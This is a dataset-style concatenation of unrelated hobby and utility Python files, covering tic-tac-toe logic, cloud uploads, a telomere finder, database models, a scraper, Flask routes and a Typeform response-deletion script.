player's mark at the given location, if possible.\n The caller must pass one of the following strings specifying\n the location:\n \"NorthWest\" Top, left square\n \"North\" Top, middle square\n \"NorthEast\" Top, right square\n \"West\" Left, middle square\n \"Center\" Center square\n \"East\" Right, middle square\n \"SouthWest\" Bottom, left square\n \"South\" Bottom, middle square\n \"SouthEast\" Bottom, right square\n\n Returns True if the specified location is available (that is,\n the global variable keeping track of that position is None);\n otherwise the function returns False for an illegal move.\n If the current player makes a valid move, the function ensures\n that control passes to the other player; otherwise, the move\n function does not affect the current player.\n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE, player\n if location == \"NorthWest\" and NW is None:\n NW = player\n change_player()\n return True\n elif location == \"North\" and N is None:\n N = player\n change_player()\n return True\n elif location == \"NorthEast\" and NE is None:\n NE = player\n change_player()\n return True\n elif location == \"West\" and W is None:\n W = player\n change_player()\n return True\n elif location == \"Center\" and C is None:\n C = player\n change_player()\n return True\n elif location == \"East\" and E is None:\n E = player\n change_player()\n return True\n elif location == \"SouthWest\" and SW is None:\n SW = player\n change_player()\n return True\n elif location == \"South\" and S is None:\n S = player\n change_player()\n return True\n elif location == \"SouthEast\" and SE is None:\n SE = player\n change_player()\n return True\n else:\n return False\n\n\ndef current_player():\n \"\"\"\n Returns the player whose turn it is to 
move. This allows the\n presentation to report whose turn it is.\n Return value is one of either \"X\" or \"O\".\n \"\"\"\n global player\n return player # Replace with your implementation\n\n\ndef set_player(new_player):\n \"\"\"\n Sets the current player. Useful for games that require the\n player to answer a question correctly before a move. If the\n player answers incorrectly, the turn moves to the opponent.\n Valid values for new_player are \"X\" or \"O\"; any other strings\n will not change the current player.\n \"\"\"\n global player\n if new_player == \"X\" or new_player == \"O\":\n player = new_player\n else:\n pass # Replace with your implementation\n\n\ndef change_player():\n \"\"\"\n Alternates turns between players. X becomes O, and O becomes X.\n \"\"\"\n global player\n if current_player() == \"X\":\n player = \"O\"\n elif current_player() == \"O\":\n player = \"X\"\n else:\n pass # Replace with your implementation\n\n\ndef look(location):\n \"\"\"\n Returns the mark at the given location. The caller must pass \n one of the following strings specifying the location:\n \"NorthWest\" Top, left square\n \"North\" Top, middle square\n \"NorthEast\" Top, right square\n \"West\" Left, middle square\n \"Center\" Center square\n \"East\" Right, middle square\n \"SouthWest\" Bottom, left square\n \"South\" Bottom, middle square\n \"SouthEast\" Bottom, right square\n\n The function's valid return values are None, \"X\", or \"O\".\n Returns None if neither player has marked \n the given location. The function also returns None if the\n caller passes any string other than one of the location strings\n listed above.\n This function allows the presentation to draw the contents\n of the Tic-Tac-Toe board.\n \"\"\"\n if location == \"NorthWest\":\n if NW == \"X\":\n return \"X\"\n elif NW == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"North\":\n if N == \"X\":\n return \"X\"\n elif N == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"NorthEast\":\n if NE == \"X\":\n return \"X\"\n elif NE == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"West\":\n if W == \"X\":\n return \"X\"\n elif W == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"Center\":\n if C == \"X\":\n return \"X\"\n elif C == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"East\":\n if E == \"X\":\n return \"X\"\n elif E == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"SouthWest\":\n if SW == \"X\":\n return \"X\"\n elif SW == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"South\":\n if S == \"X\":\n return \"X\"\n elif S == \"O\":\n return \"O\"\n else:\n return None\n elif location == \"SouthEast\":\n if SE == \"X\":\n return \"X\"\n elif SE == \"O\":\n return \"O\"\n else:\n return None\n else:\n return None # Replace with your implementation\n\n\ndef initialize_board():\n \"\"\"\n Make all the board locations empty and set current player to\n \"X\" (that is, reset the board to the start of a new game)\n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE\n NW = None\n N = None\n NE = None\n W = None\n C = None\n E = None\n SW = None\n S = None\n SE = None\n set_player(\"X\")\n \n \n \n\nif __name__ == \"__main__\":\n pass # This module is not meant to be run as a standalone 
program\n\n","repo_name":"NobleWolf42/Python101","sub_path":"Labs/TicTacToe/tttlogic.py","file_name":"tttlogic.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21151294329","text":"''' module for uploading images and media to S3 Bucket and docs to Google Cloud Storage'''\n\nimport sys\nimport os\nimport boto3\nfrom google.cloud import storage\n#from .config import Config\n\n# adds the directory containing config file\nparent_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, parent_dir) \nimport config\n\n# parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# sys.path.insert(0, parent_dir) \n\nclass FileFormatError(Exception):\n    '''raised when a file extension is not allowed for upload'''\n    pass\n\nclass Transfer:\n    '''File transfer class has functions for upload img, media to s3 and docs to gcs'''\n    def __init__(self):\n        self.aws_bucket_name = config.AWS_BUCKET\n        self.gcs_bucket_name = config.GCS_BUCKET\n        self.__create_s3_gcs_instance()\n    \n\n\n    def __create_s3_gcs_instance(self):\n\n        try:\n            self.s3_client = boto3.client(\n                's3',\n                aws_access_key_id = config.AWS_ACCESS_KEY,\n                aws_secret_access_key = config.AWS_SECRET_KEY\n            )\n            \n            self.google_client = storage.Client.from_service_account_json(config.GOOGLE_SERVICE_ACCOUNT_KEY_PATH) \n\n        except Exception as er:\n            print('error in creating cloud instance, check your configuration : ', str(er))\n\n    def transfer_files(self, source_directory):\n        '''transfers files from local to cloud'''\n        for root, dirs, files in os.walk(source_directory):\n            for file in files:\n                file_extension = file.split('.')[-1].lower()\n                file_path = os.path.join(root, file)\n                if file_extension in config.S3_ALLOWED_EXTENSIONS:\n                    self._upload_to_s3(file_path)\n\n                elif file_extension in config.GOOGLE_ALLOWED_EXTENSIONS:\n                    self._upload_to_gcs(file_path)\n\n                else: \n\n                    try:\n                        raise FileFormatError(f'{file_extension} format is not allowed to upload')\n                    \n                    except FileFormatError as fe:\n                        print(str(fe))\n    \n\n    def _upload_to_s3(self, file_path):\n        \"\"\"uploads files to s3 bucket\"\"\"\n        try: \n            self.s3_client.upload_file(file_path, self.aws_bucket_name, os.path.basename(file_path))\n            print('Files uploaded to S3 bucket successfully')\n\n        except Exception as er:\n            print('error in uploading file to s3 bucket : ', str(er))\n    \n    def _upload_to_gcs(self, file_path):\n\n        \"\"\" uploads files to Google Cloud Storage\"\"\" \n        try:\n            gcs_bucket = self.google_client.get_bucket(self.gcs_bucket_name)\n            blob = gcs_bucket.blob(os.path.basename(file_path))\n            blob.upload_from_filename(file_path)\n            print('Files uploaded to GCS successfully')\n\n        except Exception as er:\n            print('error in uploading docs to GCS', str(er)) \n    \n\n","repo_name":"rudresh1/file_transfer","sub_path":"transfer/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28876848052","text":"\nimport math\nimport numpy as np\nimport pygame as pg\n\nlink1_length = 400\nlink2_length = 400\n\norigin = [0, 0]\n\nsteps = 1000\ntheta_1 = np.linspace(math.radians(0), math.radians(180), steps)\ntheta_2 = np.linspace(math.radians(0), math.radians(180), steps)\n\n\ndef end_effector_x(angle1, angle2):\n    return int(link1_length * math.cos(angle1) + link2_length * math.cos(angle1 + angle2))\n\n\ndef end_effector_y(angle1, angle2):\n    return int(link1_length * math.sin(angle1) + link2_length * math.sin(angle1 + angle2))\n\n\n# Returns a list of every single combination of 
angles.\n# Amount of possible angles is dictated by the angle limit and step size\ndef append_angles_to_list(angle1, angle2):\n _angle_list = []\n for x in range(0, len(angle1)):\n _temp_angle_list = []\n for y in range(0, len(angle2)):\n _temp_angle_list.append([math.degrees(angle1[x]), math.degrees(angle2[y])])\n _angle_list.append(_temp_angle_list)\n return _angle_list\n\n\nangle_list = append_angles_to_list(theta_1, theta_2)\n\n\ndef solve_analytical_ik():\n _pos_list = []\n for x in range(0, steps):\n _temp_pos_list = []\n for y in range(0, steps):\n x_pos = end_effector_x(theta_1[x], theta_2[y])\n y_pos = end_effector_y(theta_1[x], theta_2[y])\n _temp_pos_list.append((x_pos, y_pos))\n _pos_list.append(_temp_pos_list)\n return _pos_list\n\n\npos_list = solve_analytical_ik()\n\n\ndef match_point_with_angle(end_eff_x, end_eff_y):\n for x in range(0, len(pos_list)):\n for y in range(0, len(pos_list[x])):\n if pos_list[x][y][0] == end_eff_x and pos_list[x][y][1] == end_eff_y:\n # print(x,y)\n # print(\"I FOUND A MATCH\")\n return [x, y]\n\n\ndef rotate_vector(length, angle):\n rad_angle = math.radians(angle)\n return [length * math.cos(rad_angle), length * math.sin(rad_angle)]\n\n\npg.init()\nsize = width, height = pg.display.Info().current_w, pg.display.Info().current_h\nscreen = pg.display.set_mode(size)\n\nwhite = 255, 255, 255\nblack = 0, 0, 0\nblue = 0, 0, 255\n\nrunning = True\nwhile running:\n\n screen.fill(white)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n running = False\n\n mouse_pos = pg.mouse.get_pos()\n\n pg.draw.circle(screen, black, mouse_pos, 5)\n pg.draw.circle(screen, black, origin, link1_length + link2_length, 5)\n try:\n solution = match_point_with_angle(mouse_pos[0], mouse_pos[1])\n angles = angle_list[solution[0]][solution[1]]\n\n vec_1 = rotate_vector(link1_length, angles[0])\n vec_2 = pos_list[solution[0]][solution[1]]\n pg.draw.circle(screen, blue, vec_1, 5)\n pg.draw.circle(screen, blue, vec_2, 5)\n pg.draw.aaline(screen, black, origin, vec_1)\n pg.draw.aaline(screen, black, vec_1, vec_2)\n\n except:\n pass\n\n pg.display.flip()\n","repo_name":"J0pper/Analytical-Inverse-Kinematics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26082007992","text":"import json\nfrom main import User, Order, Offer, db\nfrom datetime import datetime\n\n\ndef get_data_from_json(path):\n with open(path, encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef add_users_to_db():\n for user_data in get_data_from_json('data/users.json'):\n user = User(first_name=user_data['first_name'],\n last_name=user_data['last_name'],\n age=user_data['age'],\n email=user_data['email'],\n role=user_data['role'],\n phone=user_data['phone'])\n db.session.add(user)\n db.session.commit()\n\n\ndef add_offers_to_db():\n for offers_data in get_data_from_json('data/offers.json'):\n offer = Offer(order_id=offers_data['order_id'],\n executor_id=offers_data['executor_id'])\n db.session.add(offer)\n db.session.commit()\n\n\ndef add_orders_to_db():\n for orders_data in get_data_from_json('data/orders.json'):\n order = Order(name=orders_data['name'],\n description=orders_data['description'],\n start_date=datetime.strptime(orders_data['start_date'], '%m/%d/%Y'),\n end_date=datetime.strptime(orders_data['end_date'], '%m/%d/%Y'),\n 
address=orders_data['address'],\n price=orders_data['price'],\n customer_id=orders_data['customer_id'],\n executor_id=orders_data['executor_id'])\n db.session.add(order)\n db.session.commit()\n\n\ndb.drop_all()\ndb.create_all()\nadd_users_to_db()\nadd_offers_to_db()\nadd_orders_to_db()\n","repo_name":"Sh1nso/FirstAlchProject","sub_path":"utils_for_db.py","file_name":"utils_for_db.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27632647582","text":"import asyncio\nimport aiomysql\n\n\nasync def fetchall(sql, loop):\n async with aiomysql.create_pool(\n host='127.0.0.1',\n port=3306,\n user='root',\n password='root',\n db='trial',\n loop=loop\n ) as pool:\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(sql)\n return await cur.fetchall()\n\nasync def main(loop):\n '''\n '''\n a = await fetchall('SELECT * FROM t_user', loop)\n print(a)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(loop))\n loop.close()\n","repo_name":"chaosannals/trial-python","sub_path":"olddemo/main/aio/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6612869373","text":"from sqlalchemy import Column, Integer, String\n\nfrom .base import session_factory, Base\n\n\nclass Job(Base):\n __tablename__ = 'job'\n id = Column('id', Integer, primary_key=True)\n company_name = Column('company_name', String)\n job_title = Column('job_title', String)\n location = Column('location', String)\n\n\ndef add_record(company_name, job_title, location):\n if record_exists(company_name, job_title, location):\n return\n session = session_factory()\n job = Job(\n company_name=company_name,\n job_title=job_title,\n location=location\n )\n session.add(job)\n session.commit()\n session.close()\n\n\ndef record_exists(company_name, job_title, location):\n session = session_factory()\n result = session.query(Job).filter(Job.company_name == company_name).filter(\n Job.job_title == job_title).filter(Job.location == location)\n session.close()\n if result.count() == 0:\n return False\n return True\n","repo_name":"mumarkhan999/news_ycombinator_scrapper","sub_path":"database/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2474570679","text":"import os\nimport sys\nfrom Bio import SeqIO\nimport re\nimport argparse\n#--------------------------------------------\n#--------------------------------------------\n#--------------------------------------------\n# Canonical motif is TTAGGG/CCCTAA, but one might see variation\nTELOMERES = [\"C{2,4}T{1,2}A{1,3}\", \"T{1,3}A{1,2}G{2,4}\"]\n#--------------------------------------------\n#--------------------------------------------\n#--------------------------------------------\ndef findTelomere(sequence):\n '''\n This function takes a nucleotide sequence and checks if the \n start and/or end of the sequence contain telomeric repeats.\n '''\n telomere_at_start, telomere_at_end = False, False\n tel_forward, tel_reverse = TELOMERES[0], TELOMERES[1]\n\n for index, position in enumerate(sequence.upper()):\n if position != 'N':\n start_of_sequence_withoutNs = index\n break\n\n for index, position in enumerate(reversed(sequence.upper())):\n if position != 'N':\n 
end_of_sequence_withoutNs = index\n break\n end_of_sequence_withoutNs = len(sequence) - end_of_sequence_withoutNs\n\n # Look for telomeric repeats at the start of the sequence\n telomeric_repeats = re.findall(tel_forward, sequence.upper()[start_of_sequence_withoutNs:start_of_sequence_withoutNs+WINDOW])\n # Calculate the % of nucleotides that are part of telomeric repeats\n percent_telomeric_repeats_start = 100.0*sum([len(repeat) for repeat in telomeric_repeats])/float(WINDOW)\n\n # Look for telomeric repeats at the end of the sequence\n telomeric_repeats = re.findall(tel_reverse, sequence.upper()[(end_of_sequence_withoutNs-WINDOW):end_of_sequence_withoutNs])\n # Calculate the % of nucleotides that are part of telomeric repeats \n percent_telomeric_repeats_end = 100.0*sum([len(repeat) for repeat in telomeric_repeats])/float(WINDOW) \n\n # If more than half of nucleotides at the start/end are telomeric repeats\n if percent_telomeric_repeats_start >= REPEAT_CUTOFF:\n telomere_at_start = True\n if percent_telomeric_repeats_end >= REPEAT_CUTOFF:\n telomere_at_end = True\n \n return telomere_at_start, telomere_at_end, start_of_sequence_withoutNs, end_of_sequence_withoutNs\n#--------------------------------------------\n#--------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument(\"FASTA_FILE\", help=\"Supply a FASTA sequence file.\")\nparser.add_argument(\"-w\", \"--window\", type=int, help=\"This defines the number of first and last nucleotides that will get scanned for telomeric repeats (default: 50).\")\nparser.add_argument(\"-c\", \"--cutoff\", type=float, help='''A telomere is detected if >= c%% of the first (last) nucleotides are telomeric repeats (default: 50%%).''')\nargs = parser.parse_args()\n#--------------------------------------------\nif args.cutoff == None:\n REPEAT_CUTOFF = 50.0\nelse:\n REPEAT_CUTOFF = args.cutoff\n\nif args.window == None:\n WINDOW = 50\nelse:\n WINDOW = args.window\n#--------------------------------------------\nFASTA_FILE = args.FASTA_FILE\n#--------------------------------------------\nsequences = [(str(record.description), str(record.seq).strip()) for record in SeqIO.parse(FASTA_FILE, \"fasta\")]\n\nnumber_forward, number_reverse = 0, 0\nprint('##########')\nprint(len(sequences), 'sequences to analyze for telomeric repeats (TTAGGG/CCCTAA) in file', FASTA_FILE)\nprint('##########')\nprint()\n#--------------------------------------------\nfor header, sequence in sequences:\n if sequence.count('N') == len(sequence):\n pass\n else:\n forward, reverse, start_of_sequence_withoutNs, end_of_sequence_withoutNs = findTelomere(sequence)\n\n if forward == True:\n print(header, '\\t', 'Forward (start of sequence)', '\\t', sequence[start_of_sequence_withoutNs:start_of_sequence_withoutNs+WINDOW])\n number_forward += 1\n if reverse == True: \n print(header, '\\t', 'Reverse (end of sequence)', '\\t', sequence[(end_of_sequence_withoutNs-WINDOW):end_of_sequence_withoutNs])\n number_reverse += 1\n\nprint((\"\\nTelomeres found: {} ({} forward, {} reverse)\".format(str(number_forward+number_reverse),number_forward,number_reverse)))\n#--------------------------------------------\n","repo_name":"JanaSperschneider/FindTelomeres","sub_path":"FindTelomeres.py","file_name":"FindTelomeres.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"75"} +{"seq_id":"6379829213","text":"import os\nimport peewee as pw\nimport datetime\nfrom database import db\n\n\nclass 
BaseModel(pw.Model):\n created_at = pw.DateTimeField(default=datetime.datetime.now)\n updated_at = pw.DateTimeField(default=datetime.datetime.now)\n\n def save(self, *args, **kwargs):\n self.updated_at = datetime.datetime.now()\n return super(BaseModel, self).save(*args, **kwargs)\n\n class Meta:\n database = db\n # False gives our db table names the snake_case convention (base_model). If True (default), names have no convention (basemodel), so ignore_tables won't be able to detect them and basemodel WON'T be ignored.\n legacy_table_names = False\n\n\nclass Store(BaseModel):\n store_id = pw.AutoField()\n name = pw.CharField(unique=True)\n\n\nclass Warehouse(BaseModel):\n warehouse_id = pw.AutoField()\n location = pw.TextField()\n store = pw.ForeignKeyField(Store, backref='sel_wh')\n\n\nclass Product(BaseModel):\n product_id = pw.AutoField()\n name = pw.CharField(index=True)\n description = pw.TextField(null=True)\n color = pw.CharField(null=True)\n warehouse = pw.ForeignKeyField(Warehouse, backref='sel_prod')\n","repo_name":"dwihdyn/inv-mgmt-system","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"6564156006","text":"import requests\r\nimport lxml.html as lh\r\nimport bs4\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nfrom sqlalchemy import create_engine\r\nimport pymysql.cursors\r\n\r\nfrom IPython import get_ipython\r\nipy = get_ipython()\r\nif ipy is not None:\r\n ipy.run_line_magic('matplotlib', 'inline')\r\n\r\nurl2 = \"https://www.foxsports.com.co\"\r\nurl = \"https://pokemondb.net/pokedex/all\"\r\n\r\ndef Menu():\r\n print(\"\\n\")\r\n print(\"1. Mostrar Etiquetas\")\r\n print(\"2. Ver Codigo Fuente\")\r\n print(\"3. Graficar Tabla de Posiciones\")\r\n print(\"4. Mostrar Base de Datos\")\r\n print(\"0. Salir\")\r\n opcion = input(\"\\nSeleccione una opcion \")\r\n MenuOpciones(opcion)\r\n\r\ndef MenuOpciones(opcion):\r\n if(opcion == \"1\"):\r\n MenuEtiquetas()\r\n elif(opcion == \"2\"):\r\n CodigoFuente()\r\n elif(opcion == \"3\"):\r\n Graficar()\r\n elif (opcion == \"4\"):\r\n BaseDatos()\r\n else:\r\n print(\"1\")\r\n\r\ndef MenuEtiquetas():\r\n etiqueta = input(\"Que etiqueta desea mostrar? 
\")\r\n Etiquetas(etiqueta)\r\n\r\ndef Etiquetas(etiqueta):\r\n print(\"\\n\")\r\n html = urlopen(url2)\r\n soup = BeautifulSoup(html, 'html5lib')\r\n type(soup)\r\n print('\\n'.join(strong.text for strong in soup.select(etiqueta)))\r\n\r\ndef CodigoFuente():\r\n print(\"\\n\")\r\n html = urlopen(url2)\r\n soup = BeautifulSoup(html, 'html5lib')\r\n type(soup)\r\n print(soup.get_text())\r\n\r\ndef Graficar():\r\n print(\"\\n\")\r\n pagina = requests.get(url)\r\n documento = lh.fromstring(pagina.content)\r\n tr = documento.xpath('//tr')\r\n\r\n columnas = []\r\n i = 0\r\n for t in tr[0]:\r\n i += 1\r\n nombre = t.text_content()\r\n columnas.append((nombre, []))\r\n\r\n for j in range(1, len(tr)):\r\n T = tr[j]\r\n if len(T) != 10:\r\n break\r\n\r\n i = 0\r\n for t in T.iterchildren():\r\n informacion = t.text_content()\r\n if i > 0:\r\n try:\r\n informacion = int(informacion)\r\n except:\r\n pass\r\n columnas[i][1].append(informacion)\r\n i += 1\r\n\r\n Tabla = {title: column for (title, column) in columnas}\r\n df = pd.DataFrame(Tabla)\r\n nuevo_df = df.iloc[0:10]\r\n nombres = nuevo_df['Name']\r\n ataques = nuevo_df['Attack']\r\n plt.pie(ataques, labels=nombres, autopct='%1.1f%%', shadow=True, startangle=90)\r\n plt.axis('equal')\r\n plt.show()\r\n\r\ndef BaseDatos():\r\n nombres = []\r\n ataques = []\r\n\r\n conexion = pymysql.connect(host='localhost',user='root',password='123456',db='nada',charset='utf8mb4',cursorclass=pymysql.cursors.DictCursor)\r\n try:\r\n with conexion.cursor() as cursor:\r\n consulta = \"SELECT `nombre`, `ataque` FROM `informacion`\"\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall()\r\n for row in resultado:\r\n nombres.append(row[\"nombre\"])\r\n ataques.append(row[\"ataque\"])\r\n finally:\r\n conexion.close()\r\n\r\n plt.pie(ataques, labels=nombres, autopct='%1.1f%%', shadow=True, startangle=90)\r\n plt.axis('equal')\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n Menu()","repo_name":"nataliaisazaa/taller_python","sub_path":"taller.py","file_name":"taller.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"39023347748","text":"myListNum1 = [1,2,3,4,5,6,7,8]\nlistCitiesKg = ['Bishkek', 'Talas', 'Osh', 'JA', 'Naryn', 'Balykchy', 'Leilek']\nmixedList = [12, 4, 'b', 23, 'hello', 77, 12, 'Aman']\n\n# Iterating elements inside a list\ni = 0\nwhile i < len(listCitiesKg):\n print(f'{i} city: {listCitiesKg[i]}')\n i += 1\n\nprint(i)\n\ni= 0\nwhile i < len(myListNum1):\n print(f'The square of number {myListNum1[i]} is: {myListNum1[i] **2}')\n i += 1\n\n# For loop\nlistCitiesKg = ['Bishkek', 'Talas', 'Osh', 'JA', 'Naryn', 'Balykchy', 'Leilek']\ncounterFor = 0\nfor i in listCitiesKg:\n print(f'City {counterFor + 1}: {i}')\n counterFor += 1\n\nmyListNum1 = [1,2,5,4,9,6,7,8]\n\ny = 0\nfor number in myListNum1:\n print(f' The square of number {y + 1}: {number ** 2}')\n y +=1\n\nlist1 = list(range(5,10))\nlist2 = [5,6,7,8,9]\nif list1 == list2:\n print('They are the same')\nelse:\n print('Not the same')\n\n# compare with <, >, <= or >=\n# Lists are compared element by element (lexicographically)\nlist1 = list(range(5,50))\nlist2 = [5,6,7,8,9,25,100]\nif list1 > list2:\n print('First list greater than list2')\nelse:\n print('List2 greater than list1')\n\nif list1 < list2:\n print('List1 smaller than list2')\nelse:\n print('List2 smaller than list1')","repo_name":"NazgulM/Python_organized","sub_path":"Lesson 3 - List 
Methods/ListCycle.py","file_name":"ListCycle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"72950355123","text":"from app import app\nfrom flask_restful import Api\n\nfrom resources.jobs.jobs import Job_queue, FilesResource, \\\n DownloadFilesResource, CopyChewSchema, SetNGSOntoOutput, \\\n FlowcraftInspect, CheckControllerResource, FlowcraftParams, \\\n FlowcraftBuildTest\nfrom resources.downloads.downloads import DownloadResults\n\n# Setup API\napi = Api(app)\n\napi.add_resource(Job_queue, '/jobs/')\n\n# Check for resource availability\napi.add_resource(CheckControllerResource, '/jobs/check/')\n\n# trigger flowcraft inspect\napi.add_resource(FlowcraftInspect, '/jobs/inspect')\n\n# check flowcraft tags params\napi.add_resource(FlowcraftParams, '/jobs/protocols/params/')\n\n# test flowcraft build on workflow\napi.add_resource(FlowcraftBuildTest, '/jobs/workflow/test/')\n\n# get files from user\napi.add_resource(FilesResource, '/jobs/fastqs/')\n\n# set parameters of NGSOnto\napi.add_resource(SetNGSOntoOutput, '/jobs/setoutput/')\n\n# download files to user area\napi.add_resource(DownloadFilesResource, '/jobs/download/')\n\n# download result files to user area\napi.add_resource(DownloadResults, '/jobs/results/download/')\n\n# copy schema for user\napi.add_resource(CopyChewSchema, '/jobs/schema/copy/')\n","repo_name":"bfrgoncalves/INNUENDO_PROCESS_CONTROLLER","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"3986958471","text":"import os\nimport requests\nfrom datetime import datetime\n\n\nclass ScriptError(Exception):\n    \"\"\"\n    Something went wrong in the script, details can be found in the exception message\n    \"\"\"\n    pass\n\n\n# Authentication header class for requests\nclass TokenAuth(requests.auth.AuthBase):\n    \"\"\"\n    Authentication class for requests.\n    Adds a bearer token to the Authorization header\n    \"\"\"\n    def __init__(self, token):\n        self.token = token\n\n    def __call__(self, request):\n        request.headers['Authorization'] = f'Bearer {self.token}'\n        return request\n\n\nclass DeleteResponses:\n    \"\"\"\n    A class encapsulating the logic for deleting all the responses in every form contained within the authenticated\n    Typeform account.\n    \"\"\"\n\n    TYPEFORM_API = 'https://api.typeform.com/forms'\n\n    def __init__(self, auth_token):\n        \"\"\"\n        Initialize a class instance, setting the authentication token for making requests to TypeForm\n\n        :param auth_token: str\n            The token for making requests to TypeForm. 
Must have at least the following scopes:\n Forms: Read\n Responses: Read, Write\n\n :raises ScriptError:\n If no auth_token provided to constructor\n \"\"\"\n if not auth_token:\n raise ScriptError('auth_token not provided')\n\n self.token_auth = TokenAuth(auth_token)\n\n def decode_json(self, response):\n \"\"\"\n Attempt to decode the JSON payload, raising a ScriptError if it fails\n\n :param response: requests.Response\n The response object from a requests request to convert into a dict\n :return: dict\n The dict representation of the JSON response\n :raises ScriptError:\n If payload is not valid JSON\n \"\"\"\n try:\n return response.json()\n except ValueError as err:\n print('*****************\\n'\n '*Invalid Payload*\\n'\n '*****************\\n'\n f'{response.content}')\n raise ScriptError(f'Failed to decode json payload for {response.request.method} {response.url}: {err}')\n\n def get_forms_by_page(self, page):\n \"\"\"\n Make an HTTP GET request to list a given page of forms in the authenticated Typeform account\n API docs: https://developer.typeform.com/create/reference/retrieve-forms/#retrieve-forms\n\n :param page: int\n The page to fetch from the endpoint (will handle up to 200 forms per page)\n :return: (list, int)\n A tuple of the list of forms returned and the number of pages available to query.\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n forms_response = requests.get(\n f'{self.TYPEFORM_API}',\n auth=self.token_auth,\n params={\n 'page': page,\n 'page_size': 200\n }\n )\n\n if forms_response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to get list of forms: {forms_response.reason} - {forms_response.status_code}')\n\n json_response = self.decode_json(forms_response)\n\n return json_response['items'], json_response['page_count']\n\n def get_form_responses_by_page(self, form_id, page):\n \"\"\"\n Make an HTTP GET request for a single page of a form's responses. 
Up to 1000 per page.\n API docs: https://developer.typeform.com/responses/reference/retrieve-responses/#retrieve-responses\n\n :param form_id: str\n The Typeform form's identifier\n :param page: int\n The page number to request\n :return: (list, int)\n A tuple containing the list of response IDs and the number of pages available to query.\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n response = requests.get(\n f'{self.TYPEFORM_API}/{form_id}/responses',\n auth=self.token_auth,\n params={\n 'page_size': 1000,\n }\n )\n\n if response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to retrieve responses for form: {form_id} - {response.status_code}')\n\n json_response = self.decode_json(response)\n\n # map the responses so we only have their IDs & Convert the map generator object into a proper list\n response_ids = list(map(lambda item: item['response_id'], json_response['items']))\n\n return response_ids, json_response['page_count']\n\n def get_form_id_list(self):\n \"\"\"\n Fetch all forms in the account, one page at a time, concatenating all the pages together into a single list.\n\n :return: list\n A list of form ID strings\n \"\"\"\n form_list = []\n\n response_forms, page_count = self.get_forms_by_page(1)\n form_list.extend(response_forms)\n\n if page_count > 1:\n for next_page in range(2, page_count + 1):\n response_forms, _ = self.get_forms_by_page(next_page)\n form_list.extend(response_forms)\n\n # map the list of forms into just form IDs and convert the map into a list.\n return list(map(lambda form_item: form_item['id'], form_list))\n\n def get_form_responses(self, form_id):\n \"\"\"\n Get all responses for a form, one page at a time and concatenating the lists of response IDs together\n\n :param form_id: str\n The string identifier for a form, whose responses will be requested\n :return: list\n A list of string identifiers representing every response in a form\n \"\"\"\n response_ids = []\n\n responses, page_count = self.get_form_responses_by_page(form_id, 1)\n response_ids.extend(responses)\n\n if page_count > 1:\n for current_page in range(2, page_count + 1):\n responses, _ = self.get_form_responses_by_page(form_id, current_page)\n response_ids.extend(responses)\n\n return response_ids\n\n def delete_responses(self, form_id, response_ids):\n \"\"\"\n Make an HTTP DELETE request to delete all the responses identified in response_ids\n\n API docs: https://developer.typeform.com/responses/reference/delete-responses/#delete-responses\n\n :param form_id: str\n The string identifier of a Typeform form\n :param response_ids: list\n A list of response ID strings that will be deleted\n :return: None\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n del_response = requests.delete(\n f'{self.TYPEFORM_API}/{form_id}/responses',\n auth=self.token_auth,\n params={\n 